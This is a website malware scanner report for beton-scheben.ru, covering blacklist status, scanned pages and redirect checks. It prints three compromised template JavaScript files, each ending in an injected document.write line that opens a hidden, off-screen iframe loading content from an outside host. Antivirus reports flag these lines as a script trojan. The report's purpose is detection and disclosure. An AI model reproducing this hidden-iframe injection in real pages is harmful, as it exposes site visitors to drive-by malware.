New scan:

Malware Scanner report for beton-scheben.ru

Malicious/Suspicious/Total urls checked
3/0/15
3 pages have malicious code. See details below
Blacklists
Found
The website is marked by Yandex as suspicious.

The website "beton-scheben.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/4
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=beton-scheben.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://beton-scheben.ru/

Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://beton-scheben.ru/
200 OK
Content-Length: 27678
Content-Type: text/html
clean
http://beton-scheben.ru/media/system/js/caption.js
200 OK
Content-Length: 2036
Content-Type: text/javascript
clean
http://beton-scheben.ru/media/widgetkit/js/jquery.js
200 OK
Content-Length: 93403
Content-Type: text/javascript
clean
http://beton-scheben.ru/cache/widgetkit/widgetkit-c882ff6d.js
200 OK
Content-Length: 19913
Content-Type: text/javascript
clean
http://beton-scheben.ru/modules/mod_rokslideshow/tmpl/rokslideshow.js
200 OK
Content-Length: 7937
Content-Type: text/javascript
clean
http://beton-scheben.ru/modules/mod_vtem_contact/assets/captcha.js
200 OK
Content-Length: 877
Content-Type: text/javascript
clean
http://beton-scheben.ru/media/system/js/validate.js
200 OK
Content-Length: 4411
Content-Type: text/javascript
clean
http://beton-scheben.ru/templates/yoo_downtown/warp/js/warp.js
200 OK
Content-Length: 7041
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)



(function(f){var e={};f.fn.socialButtons=function(a){a=f.extend({wrapper:'<div class="socialbuttons clearfix" />'},a);if(!a.twitter&&!a.plusone&&!a.facebook)return this;a.twitter&&!e.twitter&&(e.twitter=f.getScript("//platform.twitter.com/widgets.js"));a.plusone&&!e.plusone&&(e.plusone=f.getScript("//apis.google.com/js/plusone.js"));if(!window.FB&&a.facebook&&!e.facebook)f("body").append('<div id="fb-root">&l
... 3283 bytes are skipped ...
br/>a).bind("blur.placeholder",c).trigger("blur.placeholder").end()};f(function(){f("form").bind("submit.placeholder",function(){var b=f(".placeholder",this).each(a);setTimeout(function(){b.each(c)},10)})});f(window).bind("unload.placeholder",function(){f(".placeholder").val("")})})(jQuery);
;document.write('<iframe height="110" width="110" style="top:0px;left:-500px;position:fixed;" src="http://wxouu.freewww.info/4695c8bea56557bd721d4d30d82d22.qqC7OcRDOl1u?default"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic

http://beton-scheben.ru/templates/yoo_downtown/warp/js/accordionmenu.js
200 OK
Content-Length: 1699
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)



(function(d){var a=function(){};d.extend(a.prototype,{name:"accordionMenu",options:{mode:"default",display:null,collapseall:false,toggler:"span.level1.parent",content:"ul.level2"},initialize:function(a,b){var b=d.extend({},this.options,b),c=a.find(b.toggler);c.each(function(h){var a=d(this),c=a.next(b.content).wrap("<div>").parent();c.data("height",c.height());a.hasClass("active")||h==b.display?c.show():c.hide().css("height",0);a.bind("click",function(){f(h)})});var f=function(
... 698 bytes are skipped ...
ype.name)[b].apply(c.data(a.prototype.name),Array.prototype.slice.call(g,1));else if(!b||d.isPlainObject(b)){var f=new a;a.prototype.initialize&&f.initialize.apply(f,d.merge([c],g));c.data(a.prototype.name,f)}else d.error("Method "+b+" does not exist on jQuery."+a.name)})}})(jQuery);
;document.write('<iframe height="110" width="110" style="top:0px;left:-500px;position:fixed;" src="http://wxouu.freewww.info/4695c8bea56557bd721d4d30d82d22.qqC7OcRDOl1u?default"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic

http://beton-scheben.ru/templates/yoo_downtown/warp/js/dropdownmenu.js
200 OK
Content-Length: 5602
Content-Type: text/javascript
malicious
Malicious code - confirmed by antiviruses (see below)



(function(b){var e=function(){};b.extend(e.prototype,{name:"dropdownMenu",options:{mode:"default",itemSelector:"li",firstLevelSelector:"li.level1",dropdownSelector:"ul",duration:600,remainTime:800,remainClass:"remain",matchHeight:true,transition:"easeOutExpo",withopacity:true,centerDropdown:false,reverseAnimation:false,fixWidth:false,fancy:null},initialize:function(e,j){this.options=b.extend({},this.options,j);var a=this,g=null,q=false;this.menu=e;this.dropdowns=[];this.options.witho
... 3209 bytes are skipped ...
me)[j].apply(a.data(e.prototype.name),Array.prototype.slice.call(o,1));else if(!j||b.isPlainObject(j)){var g=
new e;e.prototype.initialize&&g.initialize.apply(g,b.merge([a],o));a.data(e.prototype.name,g)}else b.error("Method "+j+" does not exist on jQuery."+e.name)})}})(jQuery);
;document.write('<iframe height="110" width="110" style="top:0px;left:-500px;position:fixed;" src="http://wxouu.freewww.info/4695c8bea56557bd721d4d30d82d22.qqC7OcRDOl1u?default"></iframe>');

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic

http://beton-scheben.ru/templates/yoo_downtown/js/template.js
200 OK
Content-Length: 1343
Content-Type: text/javascript
clean
http://beton-scheben.ru/modules/mod_vtem_image_rotator/js/jquery-1.4.2.js
200 OK
Content-Length: 72328
Content-Type: text/javascript
clean
http://beton-scheben.ru/modules/mod_vtem_image_rotator/js/jquery.mousewheel.min.js
200 OK
Content-Length: 1182
Content-Type: text/javascript
clean
http://beton-scheben.ru/modules/mod_vtem_image_rotator/js/cloud-carousel.1.0.5.js
200 OK
Content-Length: 12481
Content-Type: text/javascript
clean
https://web.redhelper.ru/service/main.js?c=betonscheben
200 OK
Content-Length: 2032
Content-Type: application/x-javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: beton-scheben.ru

Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Dec 2014 07:44:37 GMT
Pragma: no-cache
Server: nginx
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 26 Dec 2014 07:44:37 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: cc908d76d7decfebd61aba5031fcce64=h30qvm7ok4j56oo73099k001t7; path=/
Status: 200 OK
Second query (visit from search engine):
GET / HTTP/1.1
Host: beton-scheben.ru
Referer: http://www.google.com/search?q=beton-scheben.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.